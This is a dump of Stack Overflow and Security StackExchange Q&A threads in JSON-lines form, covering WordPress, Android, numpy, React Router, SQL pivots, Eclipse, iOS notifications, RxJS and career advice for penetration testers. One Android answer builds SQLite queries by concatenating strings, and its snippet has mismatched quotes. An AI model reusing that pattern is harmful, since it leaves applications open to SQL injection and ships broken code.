{\n console.log(custom_uploader.state().get('selection').toJSON());\n attachment = custom_uploader.state().get('selection').first().toJSON();\n $('#upload_image').val(attachment.url);\n });\n\n \/\/Open the uploader dialog\n custom_uploader.open();\n\n });\n\n});\n <\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to add the media uploader in wordpress plugin","dup_signals":{}},"subset":"stackexchange"} +{"text":"Update XML file\n\nQuestion: I want to replace an XML node that is not a child of the root element. How can I do it - not in .NET 3.5?\nI don't know the exact path to the node I want to replace, I get the node by XPath query like:\n<code>XmlElement root = doc.DocumentElement;\noldItem = root.SelectSingleNode(\"\/\/Node1[@name='aaa']\/\/Node2[Item='bbb']\/Value\");\n<\/code>\nHow can I replace this old item?\nComment: what do you want to replace **exactly**? give a before-after example.\nAnswer: Use <code>root.SelectSingleNode(\"query\").Value = [New value]<\/code>\n","meta":{"source":"stackoverflow","title":"Update XML file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Android: Searching in list using array adapter\n\nQuestion: My problem here is when I scroll the words manually select it from the list, it correctly displays the definition. However, when I type it and search for the definition, it always shows the first item of my list. I'm currently learning android by going through tutorials and came across this example but couldn't fix the bug. Here is my code:\nHere's my output picture\n<code>public class DbBackend extends DbObject{\n\n public DbBackend(Context context) {\n super(context);\n }\n\n public String[] dictionaryWords(){\n String query = \"Select * from dictionary\";\n Cursor cursor = this.getDbConnection().rawQuery(query, null);\n ArrayList<String> wordTerms = new ArrayList<String>();\n if(cursor.moveToFirst()){\n do{\n String word = cursor.getString(cursor.getColumnIndexOrThrow(\"word\"));\n wordTerms.add(word);\n }while(cursor.moveToNext());\n }\n cursor.close();\n String[] dictionaryWords = new String[wordTerms.size()];\n dictionaryWords = wordTerms.toArray(dictionaryWords);\n return dictionaryWords;\n }\n\n\/\/\n\/\/ public int getIndexByValue(String value){\n\/\/ S\n\/\/ }\n public QuizObject getQuizById(int quizId){\n\n QuizObject quizObject = null;\n String query = \"select * from dictionary where _id = \" + quizId;\n Cursor cursor = this.getDbConnection().rawQuery(query, null);\n if(cursor.moveToFirst()){\n do{\n String word = cursor.getString(cursor.getColumnIndexOrThrow(\"word\"));\n String meaning = cursor.getString(cursor.getColumnIndexOrThrow(\"meaning\"));\n quizObject = new QuizObject(word, meaning);\n }while(cursor.moveToNext());\n }\n cursor.close();\n return quizObject;\n }\n}\n<\/code>\nHere's the Dictionary activity \n<code>public class DictionaryActivity extends ActionBarActivity {\n\n private TextView wordMeaning;\n private TextToSpeech convertToSpeech;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_dictionary);\n\n Intent intent = getIntent();\n Bundle bundle = intent.getExtras();\n int dictionaryId = bundle.getInt(\"DICTIONARY_ID\");\n int id = dictionaryId + 1;\n\n TextView word = (TextView)findViewById(R.id.word);\n wordMeaning = (TextView)findViewById(R.id.dictionary);\n Button textToSpeech = (Button)findViewById(R.id.button);\n\n DbBackend dbBackend = new DbBackend(DictionaryActivity.this);\n QuizObject allQuizQuestions = dbBackend.getQuizById(id);\n\n word.setText(allQuizQuestions.getWord());\n wordMeaning.setText(allQuizQuestions.getDefinition());\n\n }\n<\/code>\nAnother class\n<code>public class MainActivity extends ActionBarActivity {\n\n private EditText filterText;\n private ArrayAdapter<String> listAdapter;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n\n filterText = (EditText)findViewById(R.id.editText);\n ListView itemList = (ListView)findViewById(R.id.listView);\n\n DbBackend dbBackend = new DbBackend(MainActivity.this);\n String[] terms = dbBackend.dictionaryWords();\n\n listAdapter = new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, android.R.id.text1, terms);\n\n itemList.setAdapter(listAdapter);\n itemList.setOnItemClickListener(new AdapterView.OnItemClickListener() {\n @Override\n public void onItemClick(AdapterView<?> parent, View view, int position, long id) {\n \/\/ make Toast when click\n Toast.makeText(getApplicationContext(), \"Position \" + position, Toast.LENGTH_LONG).show();\n\n Intent intent = new Intent(MainActivity.this, DictionaryActivity.class);\n intent.putExtra(\"DICTIONARY_ID\", id);\n startActivity(intent);\n }\n });\n<\/code>\nComment: Searching by word itself would work, and I believe this is what Juan Salamanca's answer suggests. The problem is `ArrayAdapter` uses the `position` as the id, so the `id` you are given is not the id of the row in the database for that word. If you had a wrapper class to contain the word and it's database id, and stored that in the adapter instead, you could make `getitemId` return the proper id. But you would have to modify the adapter a lot more, at which point I'd say extend `BaseAdapter` instead of `ArrayAdapter` (I almost never use `ArrayAdapter` for reasons like this one).\nComment: There's a lot of code here, much of which seems unrelated to your problem. Please try to narrow down what part of the code doesn't seem to be doing what you intend it to. If you can't narrow it down from all of what you posted, that suggests you haven't really spent enough time trying to solve it. A good place to start would be the place where the item is clicked.\nComment: My apologies for copy pasting everything. I have narrow down the code now.I tried looking into the code I found out that the position of my list is not moving. No matter what I search for, my MainAcitivity class is always sending a position value of zero to another display activity, and displays the first item from the list. Perhaps, the value of position hasn't been updated. Should I pass the id instead of position?\nComment: The position refers to where it is in the adapter, not where it is in your database. When the list is filtered, the adapter saves away the original list and swaps it with a list that has only the items matching the filter term. The adapter is correctly reporting that the position is zero. Since positions do not identify data, you need to use something else to identify the data at that position.\nComment: Okay so you are saying I should retrieve the word by using id instead of position?\nComment: I was thinking may be I should change my query and search for word instead of id by doing this.\nComment: String query = \"select * from dictionary where word = \" + editText; and retrieve values.\nComment: Okay I tried this line of code in onItemClick: String selected = terms[position]; intent.putExtra(\"DICTIONARY_ID\", selected); and also changed the query to String query = \"select * from dictionary where word = '\" + quizId; But it gave this error message : QuizObject.getWord()' on a null object\nAnswer: In this part try to get the word not the id\n<code>public void onItemClick(AdapterView<?> parent, View view, int position, long id) {\n \/\/ make Toast when click\n Toast.makeText(getApplicationContext(), \"Position \" + position, Toast.LENGTH_LONG).show();\n String selectedText = (String) parent.getItemAtPosition(position);\n Intent intent = new Intent(MainActivity.this, DictionaryActivity.class);\n intent.putExtra(\"DICTIONARY_ID\", selectedText);\n startActivity(intent);\n }\n<\/code>\nand the query \n<code>String query = \"select * from dictionary where _id = \" + quizId;\n<\/code>\nreplace by\n<code>String query = \"select * from dictionary where word = '\" + quizId + \"';\n<\/code>\nremenber the quizId now is the word in the position of your list,\nComment: Isn't it same to pass either id or word since both are from the same row?\nComment: So you are saying to do this ? String selected = terms[position]; intent.putExtra(\"DICTIONARY_ID\", selected);\nComment: When I changed the query to word, it is throwing this error message QuizObject.getWord()' on a null object reference\nComment: try with the view\nComment: Do you mean the textview?\nComment: im sorry yes.. try with the view in setOnItemClickListener TextView = (TextView) view.findViewById(android.R.id.text1); try to get the text of the item and pass to the query\nComment: I'm sorry how do I get the text of the item and pass it to query?\nComment: use this String str = ((TextView)view ).getText().toString(); in setonitemclicklistener metod the full answer is this http:\/\/stackoverflow.com\/questions\/11683547\/getting-a-string-from-a-listview-item-in-setonitemclicklistener\nComment: I tried this code from the link you directed me TextView textView = (TextView) view.findViewById(android.R.id.text1);\n LinearLayout row = (LinearLayout)((LinearLayout)view).getChildAt(0);\n textView = (TextView)row.getChildAt(0);\n String text = textView.getText().toString(); I got this error message : java.lang.ClassCastException: android.widget.TextView cannot be cast to android.widget.LinearLayout\nComment: intent.putExtra(\"DICTIONARY_ID\",text); \/\/ The text was passed onto another activity like this\n","meta":{"source":"stackoverflow","title":"Android: Searching in list using array adapter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get the indices of min values for each row in a 2D np.array, if the min value satisfies a condition\n\nQuestion: I've a 2D <code>np.array<\/code> with dimension <code>1000 (rows) x 12 (columns)<\/code>.\nI need to get the indices of those values that are below <code>1.5<\/code>.\nIf a row contains more than one value that satisfies this condition, then I need to keep only the indices of the lowest.\nI'd be quite happy with using \n<code>idx1,idx2=np.where(x < 1.5)<\/code>,\n but this sometimes returns several indices that are in the same rows.\nI could of course loop over all repeated rows in <code>idx1<\/code> and keep only the indices whose values in <code>x<\/code> where are the lowest, but I was wondering if there's a more pythonic way.\nThanks\nComment: What if a row does not contain any value below 1.5? Do you just skip the row?\nComment: @jdehesa yes, then I'm no interested in that row. Only in the row-column indexes that are below 1.5, provided they are the lowest of their row\nAnswer: You can just do this:\n<code># First index is all rows\nidx1 = np.arange(len(x))\n# Second index is minimum values\nidx2 = np.argmin(m, axis=1)\n# Filter rows where minimum is not below threshold\nvalid = x[idx1, idx2] < 1.5\nidx1 = idx1[valid]\nidx2 = idx2[valid]\n<\/code>\nAnswer: One way would be to use a numpy masked array. Lets define the following random <code>ndarray<\/code>:\n<code>a = np.random.normal(1,2,(4,2))\n\nprint(a.round(2))\narray([[ 1.41, -0.68],\n [-1.53, 2.74],\n [ 1.19, 2.66],\n [ 2. , 1.26]])\n<\/code>\nWe can define a masked array with:\n<code>ma = np.ma.array(a, mask = a >= 1.5)\n\nprint(ma.round(2))\n[[1.41 -0.68]\n [-1.53 --]\n [1.19 --]\n [-- 1.26]]\n<\/code>\nIn order to deal with rows with no values bellow the threshold, you could do:\n<code>m = ma.mask.any(axis=1)\n# array([ True, True, True, True])\n<\/code>\nWhich will contain a <code>False<\/code> if there are no valid values along a given row.\nAnd then take the <code>np.argmin<\/code> over the masked array to get the columns with the minimum values bellow 1.5:\n<code>np.argmin(ma, axis=1)[m]\n# array([1, 0, 0, 1])\n<\/code>\nAnd for the rows you could do:\n<code>np.flatnonzero(m)\n# array([0, 1, 2, 3])\n<\/code>\n","meta":{"source":"stackoverflow","title":"Get the indices of min values for each row in a 2D np.array, if the min value satisfies a condition","dup_signals":{}},"subset":"stackexchange"} +{"text":"IMG_FILTER_COLORIZE not working as it should\n\nQuestion: I am trying to turn a PNG image with a white box to a green box. The background of the PNG is transparent.\nI have written out code but it doesn't work for some reason. I have looked and tried a lot of things and i cannot see anything wrong with the code.\nThanks\n<code>header(\"Content-type: image\/png\");\n$image = imagecreatefrompng($filename);\nimagefilter($image, IMG_FILTER_COLORIZE, 0, 255, 0, 100);\nimagesavealpha($image, TRUE);\nimagepng($image, $save_filename); \n<\/code>\nThe image gets exported still with a white box. Will IMG_FILTER_COLORIZE not work with white?\nThanks\nAnswer: I have fixed this issue. To anyone in the future...\nI added \n<code>imagefilter($image, IMG_FILTER_NEGATE); \n<\/code>\nBefore image_filter(\n","meta":{"source":"stackoverflow","title":"IMG_FILTER_COLORIZE not working as it should","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I add React router to the content section in the main layout?\n\nQuestion: I am developing application using React redux-toolkit. I added the route schema, and then I get the 'wow' error saying the page can't respond when it probably goes into an infinite loop. I have a MainLayout and I want to go to the content part of it by clicking the properties of the layout in the side menu. For example, the page that gives the list of registered cities when I click, the page that gives the names of the countries. I want to give these pages in the content section of the main layout. That's why I need to give you the route diagram that I have prepared. Since I also wrap routes in the app, I think it goes into an infinite loop because it wraps the route part twice, but I don't know how I can solve it. I need help.\n<code>function AppRoutes() {\n return (\n <Routes>\n <Route element={<PrivateRoutes><MainLayout\/><\/PrivateRoutes>} path=\"\/\">\n {\/* <Route element={<MainLayout\/>} path=\"\/\"\/> *\/}\n <\/Route>\n <Route element={<Login\/>} path=\"\/login\"\/>\n <Route element={<CityList\/>} path=\"\/city\/list\"\/>\n <Route element={<Register\/>} path=\"\/register\"\/>\n <Route element={<ActivateEmail\/>} path=\"\/account\/activate\"\/>\n <Route element={<NoMatch\/>} path=\"*\"\/>\n <\/Routes>\n )\n}\n\nexport default AppRoutes\n\nconst PrivateRoutes = ({children}) => {\n const {userToken } = useSelector((state) => state.auth);\nif(!userToken){\nreturn <Navigate to=\"\/login\"\/>\n}else{\n return children;\n}\n}\n\nexport default PrivateRoutes;\n\nfunction App() {\n const [locale, setLocale] = useState('tr');\n return (\n <IntlProvider locale={locale} messages={messages[locale]}>\n <AppRoutes\/>\n <\/IntlProvider>\n );\n};\n\nexport default App\n\nimport { UserOutlined, FileOutlined, SettingOutlined, DownOutlined, LogoutOutlined } from \"@ant-design\/icons\";\nimport { Breadcrumb, Layout, Menu, theme, Input, Space, Card, Button, Dropdown, message, Tag, Spin, Row, Col, Form } from \"antd\";\nimport { useState, useEffect } from \"react\";\nimport { RiLockPasswordLine } from 'react-icons\/ri'\nimport {AiOutlineMenu} from 'react-icons\/ai'\nimport { useDispatch, useSelector } from \"react-redux\";\nimport { getUserbyId, signOut } from \"..\/utils\/api.service\";\nimport { useNavigate } from 'react-router-dom';\nimport { getTokenSub } from '..\/utils\/HelperFunctions';\nimport { getUser, userInfo } from '..\/types\/user';\nimport { useIntl } from \"react-intl\";\nimport AppRouteList from \"..\/routes\/AppRouteList\";\nimport FormButton from \"..\/components\/FormButton\";\nimport InputDisableText from \"..\/components\/InputDisableText\";\nimport AppRoutes, { RouteApp } from \"..\/routes\/AppRoutes\";\n\nconst { Header, Content, Footer, Sider } = Layout;\n\nexport function MainLayout() {\n const {userToken } = useSelector((state) => state.auth);\n const intl = useIntl();\n const navigate = useNavigate();\n const menuItemClick = (e) => {\n switch(e.key){\n case \"menu_city_list\":\n navigate(\"\/city\/list\")\n break;\n default:\n break;\n }\n }\n \n function getItem(label, key, icon, children) {\n return {\n key,\n icon,\n children,\n label,\n };\n }\n const items = [\n getItem(\"Faturalar\", \"sub1\", <FileOutlined \/>, [\n getItem(\"Team 1\", \"1\"),\n getItem(\"Team 2\", \"2\"),\n ]),\n getItem(\"Sistem Ayarlar\u0131\", \"sub2\", <SettingOutlined \/>, [\n getItem(\"\u00dclkeler\", \"5\"),\n getItem(intl.formatMessage({id:\"menu_city_list\"}),\"menu_city_list\",<AiOutlineMenu\/>),\n getItem(\"Client\", \"7\"),\n getItem(\"Tom\", \"8\"),\n getItem(\"Bill\", \"9\"),\n getItem(\"Alex\", \"10\"),\n getItem(\"Tom\", \"11\"),\n \/\/ getItem(\"Bill\", \"12\"),\n \/\/ getItem(\"Alex\", \"13\"),\n \/\/ getItem(\"Tom\", \"14\"),\n getItem(\"Genel Ayarlar\", \"15\"),\n ]),\n getItem(\"Hesab\u0131m\", \"sub3\", <UserOutlined \/>, [\n getItem(\"Hesab\u0131m\", \"3\"),\n getItem(\"Oturum Kapat\", \"4\"),\n ]),\n ];\n const handleButtonClick = (e) => {\n message.info('Click on left button.');\n console.log('click left button', e);\n };\n const handleMenuClick = (e) => {\n message.info('Click on menu item.');\n console.log('click', e);\n };\n const [isLoading, setIsLoading] = useState(false);\n const token = localStorage.getItem('userToken');\n const sub = getTokenSub(token);\n const dispatch = useDispatch();\n getUser.Id = sub\n\n useEffect(() => {\n dispatch(getUserbyId(getUser)).then((result) => { \n userInfo.id = result.payload.id\n userInfo.clientId = result.payload.clientId\n userInfo.clientName = result.payload.clientName\n userInfo.email = result.payload.email\n userInfo.firstName = result.payload.firstName\n userInfo.lastName = result.payload.lastName\n userInfo.isActive = result.payload.isActive\n userInfo.normalizedEmail = result.payload.normalizedEmail\n userInfo.userName = result.payload.userName\n userInfo.passwordChangeTime = result.payload.passwordChangeTime\n });\n }, [dispatch, getUser])\n\n useEffect(() => {\n setIsLoading(true);\n setTimeout(() => {\n setIsLoading(false);\n }, 1000);\n }, []);\n\n const handleLogout = () => {\n dispatch(signOut())\n };\n const itemsDropDown = [\n {\n label: 'Hesab\u0131m',\n key: '100',\n icon: <UserOutlined \/>,\n },\n {\n label: '\u015eifremi De\u011fi\u015ftir',\n key: '200',\n icon: <RiLockPasswordLine \/>,\n },\n {\n label: 'Oturum Kapat',\n key: '400',\n icon: <LogoutOutlined \/>,\n danger: true,\n onClick: handleLogout\n },\n ];\n\n const menuProps = {\n items: itemsDropDown,\n \/\/ onClick: handleMenuClick,\n };\n const [collapsed, setCollapsed] = useState(false);\n const {\n token: { colorBgContainer },\n } = theme.useToken();\n \n\n return (\n <div style={{ display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100vh' }}>\n {isLoading ? (\n <Spin size=\"large\" \/>\n ) : (\n <Layout\n style={{\n minHeight: \"100vh\",\n }}\n >\n {console.log(\"user \u0131nfo\", userToken)}\n <Sider\n collapsible\n collapsed={collapsed}\n onCollapse={(value) => setCollapsed(value)}\n >\n <div\n style={{\n height: 32,\n margin: 16,\n background: \"rgba(255, 255, 255, 0.8)\",\n }}\n >\n <\/div>\n <Menu\n theme=\"dark\"\n defaultSelectedKeys={[\"1\"]}\n mode=\"inline\"\n items={items}\n onClick={menuItemClick}\n \/>\n <\/Sider>\n <Layout className=\"site-layout\">\n <Header\n style={{\n padding: 0,\n background: colorBgContainer,\n }}\n >\n <\/Header>\n <Content\n style={{\n margin: \"0 16px\",\n }}\n >\n {\/* <AppRoutes\/> PROBLEM HERE *\/} \n\n <\/div>\n <\/Content>\n <Footer\n <\/Footer>\n <\/Layout>\n <\/Layout>\n )}\n <\/div>\n );\n}\n<\/code>\nWhen I open the AppRoutes component in the comments line in the content on the main layout page, it enters an endless loop and the browser stops responding and gives an error.\nWeb Browser\nAnswer: <code>AppRoutes<\/code> renders <code>MainLayout<\/code> which when rendering another <code>AppRoutes<\/code> renders another <code>MainLayout<\/code>... do you see the problem? This creates a \"render loop\" by infinite recursion.\nI suspect you meant for <code>MainLayout<\/code> to render an <code>Outlet<\/code> component for nested routes it may be rendering as a layout route.\n<code>import { Outlet } from 'react-router-dom';\n\n...\n\nexport function MainLayout() {\n ...\n\n return (\n <div style={{ .... }}>\n {isLoading ? (\n <Spin size=\"large\" \/>\n ) : (\n <Layout style={{ .... }}>\n ...\n <Layout className=\"site-layout\">\n <Header style={{ .... }} \/>\n <Content style={{ .... }}>\n <Outlet \/> \/\/ <-- for nested route content\n <\/Content>\n <Footer \/>\n <\/Layout>\n <\/Layout>\n )}\n <\/div>\n );\n}\n<\/code>\nIf you are intending for <code>MainLayout<\/code> to be a layout route component for all routes then it should wrap all routes. The <code>PrivateRoute<\/code> component should also be converted to a layout route component so it can wrap all routes that should be protected.\n<code>import { Navigate, Outlet } from 'react-router-dom';\n\nconst PrivateRoutes = () => {\n const { userToken } = useSelector((state) => state.auth);\n\n return userToken ? <Outlet \/> : <Navigate to=\"\/login\" replace \/>;\n}\n<\/code>\n<code>function AppRoutes() {\n return (\n <Routes>\n <Route element={<Login \/>} path=\"\/login\" \/>\n <Route element={<Register \/>} path=\"\/register\" \/>\n {\/* ... other non-main-layout routes *\/}\n \n <Route element={<MainLayout \/>}>\n <Route element={<ActivateEmail \/>} path=\"\/account\/activate\" \/>\n {\/* ... other unprotected routes *\/}\n\n <Route element={<PrivateRoutes \/>}>\n <Route element={<CityList \/>} path=\"\/city\/list\" \/>\n {\/* ... other protected routes *\/}\n <\/Route>\n\n <Route element={<NoMatch \/>} path=\"*\" \/>\n {\/* ... other main-layout routes *\/}\n <\/Route>\n <\/Routes>\n )\n}\n<\/code>\nComment: When I still click on the link there, another page opens instead of appearing in the content, it just does not contain the layout of that component.\nComment: As you mentioned, I noticed the problem, but I still can't solve it.\nComment: @Joseph Which links are you referring to, and *what* exactly is opening not where you expect it? With the current code you aren't rendering anything in the `MainLayout`. I'm guessing at this point what you are wanting is for all the routes (*`\".login\"`, `\"\/city\/list\"`, etc*) to render their content in the main layout? Is this a correct assumption?\nComment: @Joseph I'm going to also guess that you don't necessarily want to protect ***all*** the routes, e.g. `\"\/login\"`, so they are reachable by unauthenticated users?\nComment: As you can see in the main layout, I have a menu and for example an element in a menu goes to \/city\/list when I press it. I want to show the outputs of the component of this link in the content of the main layout. So I want to update the content as the layout hard link is updated. I hope I was able to explain\nComment: login should be blocked if logged in and if there is a token\nComment: I have attached as expectation-realized image\nComment: @Joseph Based on the image it seems I'm correct in that you want all the routed content to be rendered in the content section of the main layout component. I've updated my answer. If you want to prevent authenticated users from accessing the `\"\/login\"` route then create another protected route component that does the *inverse* of `ProtectedRoutes` and render the routes you don't want authenticated users to access inside it.\nComment: Now I get what I want, but it shows in content on login and registration pages and not as a separate page, how can I set it?\nComment: @Joseph Move those two routes out of the `MainLayout` layout route. I've updated answer again... hopefully the comments don't make it more difficult to understand how the routes and layouts are working.\nComment: I saw it later, thank you very much.\n","meta":{"source":"stackoverflow","title":"How can I add React router to the content section in the main layout?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should a penetration tester have training in ISO 27001\/ITIL etc?\n\nQuestion: I recently got offered a promotion but as part of the package I've been requested to do ISO 27001, ITIL, ARPA and other kinds of training. I've previously avoided this sort of training as I felt it would 'distract' me from my technical security knowledge.\nIn terms of penetration testing, are these qualifications useful? Do these provide good frameworks for penetration testing? I have zero aspirations to become a non-technical manager (at least for the foreseeable future) and compliance\/auditing doesn't interest me specifically. However, my knowledge around them is minimal so I'm curious if I should take them up on the offer or suggest technical training instead.\nAnswer: While it may not be the hardcore technical pentesting you are used to, it will definitely aid you in understanding processes and security controls within a company. This may help you to bring your findings in an understandable way to the business and IT management.\nObviously it also means you could do more than just pentesting as you could also write a standard or baseline (27001).\nDon't be afraid to try something new from time to time :).\nComment: In my experience it also allows you to manage pen test teams, sell the benefits of testing to risk and compliance officers, and generally widen your horizons... If you want to.\nAnswer: I've rarely found more knowledge to be a detrimental thing. It may not be super useful, but it may help in some rare scenarios.\nAnswer: Not of much benefit. I am a PenTester with both ITIL and ISO 27k certifications. While ITIL has hardly to do anything directly with information security and is very generic but can be effective in putting a process for faster incident response and change control. ISO 27k exists as standard and very broad guidelines for processes to be followed by any organization who takes InfoSec seriously. The standard also provisions for Audits to measure effectiveness of information security processes and controls. This audit can include both Source Code Analysis and Penetration Testing. Only way a Penetration Tester can find some use of this is to expect some level of security exists if the Organization is ISO 27k Certified. You won't be taught a single command when attending these trainings.\nThe knowledge of ITIL and ISO 27k will be required if you are trying to get a managerial role within big organizations. They like to measure everything and have metrics for nearly all process outcomes. ITIL and ISO 27k are more about process who has scope and mechanism built for continuous improvement.\n","meta":{"source":"security.stackexchange","title":"Should a penetration tester have training in ISO 27001\/ITIL etc?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Convert a row to column depending on Conditon\n\nQuestion: I have a table\nTable1\n<code>ID ItemNbr Seq ClassNbr Descr Amount ItmNbrSrc\nE0001 00000000001 001 10143 Physics 1000 \nE0001 00000000002 001 10144 Chemistry 1200 \nE0001 00000000003 001 10145 Biology 1500 \nE0001 00000000004 001 10143 Discount 01 100 \nE0001 00000000005 001 10144 Discount 02 200 \nE0001 00000000006 001 VAT 50 00000000001\nE0001 00000000007 001 VAT 60 00000000002\nE0001 00000000008 001 VAT 75 00000000003\nE0001 00000000001 002 10143 Physics 1100 \nE0001 00000000002 002 10144 Chemistry 1300 \nE0001 00000000003 002 10145 Biology 1700 \nE0001 00000000006 002 VAT 70 00000000001\nE0001 00000000007 002 VAT 80 00000000002\nE0001 00000000008 002 VAT 95 00000000003\nE0001 00000000009 001 TOEFL 100\nEOOO1 00000000010 001 VAT 5 00000000009 \n<\/code>\nDiscount Items always have Descr starting with \"Discount\"\nI want to print the Discount Values in Another Column against that ClassNbr\nand the value of VAT in another column which depends on ItmNbrSrc\nDiscount Items only have once instance per ClassNbr. We can have ClassNbr multiple times uniquely identified by ItemNbr+Seq\n<code>ID itemNbr Seq ClassNbr Descr Amount Discount VAT \nE0001 00000000001 001 10143 Physics 1000 100 50 \nE0001 00000000002 001 10144 Chemistry 1200 200 60 \nE0001 00000000003 001 10145 Biology 1500 0 75\nE0001 00000000001 002 10143 Physics 1100 130 0 \nE0001 00000000002 003 10144 Chemistry 1300 220 0 \nE0001 00000000003 004 10145 Biology 1700 0 0\nE0001 00000000010 001 TOEFL 100 0 5\n \n<\/code>\nI tried using Max(decode) with Group By but it didn't seem to work.\nAnswer: You could use window functions to re-assign the class number of <code>VAT<\/code> rows, then conditional aggregation to pivot the resultset:\n<code>select\n id,\n max(itemNbr) itemNbr,\n newClassNbr,\n max(case when descr <> 'VAT' and descr not like 'Discount%' then descr end) descr,\n max(case when descr <> 'VAT' and descr not like 'Discount%' then amount end) amount,\n max(case when descr like 'Discount%' then amount end) discount,\n max(case when descr = 'VAT' then amount end) vat\nfrom (\n select\n t.*,\n coalesce(classNbr, max(classNbr) over(partition by id, coalesce(ItmNbrSrc, ItemNbr))) newClassNbr\n from mytable t\n) t\ngroup by id, newClassNbr\norder by 2\n<\/code>\nDemo on DB Fiddle:\n\nID | ITEMNBR | NEWCLASSNBR | DESCR | AMOUNT | DISCOUNT | VAT\n:---- | ------: | :---------- | :-------- | -----: | -------: | --:\nE0001 | 6 | 10143 | Physics | 1000 | 100 | 50\nE0001 | 7 | 10144 | Chemistry | 1200 | 200 | 60\nE0001 | 8 | 10145 | Biology | 1500 | null | 75\nComment: I have edited my requirements after getting the results from your SQL. I apologize in advance.\n","meta":{"source":"stackoverflow","title":"Convert a row to column depending on Conditon","dup_signals":{}},"subset":"stackexchange"} +{"text":"Eclipse is slow, and hangs some times\n\nQuestion: My workspace has almost of 2 GB, and I am using Eclipse Ganymede with Tomcat 6.0 (as I am working on a dynamic web project). \nI am facing a bad development experience as Eclipse is so slow and even hangs on pressing Ctrl+Space.\nI think higher versions are more slow with my workspace. Please give suggestions on how to remedy this.\nComment: Ganymede? That's a quite old version. Try to update to a newer version (thinking they will be slower is OK, but you need to try them first). Also close projects you're not using, or try to make separate workspaces.\nComment: do you placed any breakpoints in your application\nComment: some times it might be the problem\nComment: Having a lot of RAM, a SSD and powerful CPUs certainly help. In case you run Linux, try the tool `atop` which shows current bottlenecks (disk? ram? cpu?).\nComment: 2GB is a one project or a couple? If few just close whose currently not use. The same with plugins, remove if you can remove and you dont need it.\nComment: i have i5 processor with 4GB RAM, I have tried new versions but found slow. and i have 2 project both are dependent so cant be closed\nAnswer: This may help\nIn your eclipse,\n1) Go to Help\n2) Click Eclipse marketplace\n3) search - optimizer\ninstall \"optimizer for eclipse\"\n","meta":{"source":"stackoverflow","title":"Eclipse is slow, and hangs some times","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to add textfield in iOS interactive notification\n\nQuestion: I want to develop interactive notification just like imessage . i read documentation and i tried with adding multiple UIMutableUserNotificationAction to UIMutableUserNotificationCategory and display it. i want to display textfield just like iMessage . this is my problem\n<code>UIMutableUserNotificationCategory *notificationCategory = [[UIMutableUserNotificationCategory alloc] init];\nnotificationCategory.identifier = @\"Email\";\n[notificationCategory setActions:@[notificationAction1,notificationAction2,notificationAction3] forContext:UIUserNotificationActionContextDefault];\n[notificationCategory setActions:@[notificationAction1,notificationAction2] forContext:UIUserNotificationActionContextMinimal];\n<\/code>\nplease help\nComment: Duplicate question and answer: http:\/\/stackoverflow.com\/questions\/25841227\/adding-text-field-in-remote-notificaton-ios-8\nComment: thanks @Flipper. worked like a charm.\nAnswer: <code>let replyAction = UIMutableUserNotificationAction()\nreplyAction.identifier = \"REPLY_ACTION\"\nreplyAction.title = \"Reply\"\nreplyAction.activationMode = UIUserNotificationActivationMode.Background\nreplyAction.authenticationRequired = false \nreplyAction.destructive = false\n\/\/Set behaviour to .TextInput \nreplyAction.behavior = .TextInput\n<\/code>\n","meta":{"source":"stackoverflow","title":"how to add textfield in iOS interactive notification","dup_signals":{}},"subset":"stackexchange"} +{"text":"Display loader only when api call will be longer then 1 sec\n\nQuestion: I have tried and I still trying to create a mechanism in Angular using rx that will display my loader, but only if the API call is longer than 1 second, if it is shorter I would not like to display it.\nI've tried many different ways, but I haven't been able to achieve what I need.\nThe closest I came to a solution was in this case:\n<code> const apiCall = this.searchService\n .query(this.query)\n .pipe(finalize(()=> this.loading = false));\n\n timer(1000)\n .pipe(takeUntil(apiCall))\n .subscribe(()=> {\n this.loading = true;\n })\n\n apiCall.subscribe(result => {\n \/\/do smth\n })\n<\/code>\nIn this case loader would be shown after the API request was completed, but it would immediately disappear becouse of finalize method (and it would also be called twice).\nDoes anyone have an idea on how to do something like this because I'm running out of ideas?\nComment: maybe an animation could work for that? Initial size of loading indicator would be 0,0... after 1 second delay it get's it's width\/height. (problem is if it takes 1.1 seconds you'd still have the sort of blinking in and out behavior I think you're trying to avoid)\nComment: Agree with @pcalkins, this kind of stuff is better handled with transitions. You can't predict how much it will take the call, so at any point you decide to blink in the loading spinner it could happen that in the next 100ms the call finishes. Just set the state to loading = true immediately, but make the spinner fade-in during 300ms\nAnswer: I haven't tested your code but my guess is your code will call the api twice and thats the reason it removes the loader on the first call and second call doesn't care about the loader at all. something like this should work.\n<code>const apiObservable = this.searchService.\n .query(this.query).pipe(startWith(null));\n\nconst isLoadingObservable = timer(1000).pipe(\n map(() => true),\n startWith(false),\n take(2),\n);\n\ncombineLatest(apiObservable, isLoadingObservable).pipe(\n tap(([resp, isLoading]) => this.isLoading = isLoading),\n filter(([resp, isLoading]) => resp !== null)\n).subscribe(resp => {\n this.isLoading = false;\n \/\/do smth\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Display loader only when api call will be longer then 1 sec","dup_signals":{}},"subset":"stackexchange"} +{"text":"Android Share Text on Facebook instead of Link\n\nQuestion: I am working on Text Sharing on From my Android Application . I have used the following code. \n<code>Intent sharingIntent = new Intent(Intent.ACTION_SEND);\nsharingIntent.setType(\"text\/plain\"); \nString text=\"http:\/\/google.com\";\nsharingIntent.putExtra(android.content.Intent.EXTRA_TEXT,text);\nsharingIntent.putExtra(android.content.Intent.EXTRA_SUBJECT, \"Message\");\nstartActivity(Intent.createChooser(sharingIntent, \"Share using\"));\n<\/code>\nIf I will this code means it shares link correctly and shows like following image !\nAttached Image \nWhen I am using normal text like \"sample content\" means it is not accepting and showing the text .... I need to share the text instead of that link .. please help me ... \nIts working correctly for Gmail and Twitter also. \nWaiting for better response..... Thanks in Advance \nAnswer: This is a limitation with the (stupid) Facebook app. They know about it, but apparently don't want to fix it.\nYour only option is to implement Facebook sharing using their API.\nComment: @Ollie.. By using Facebook API is it possible to get the user 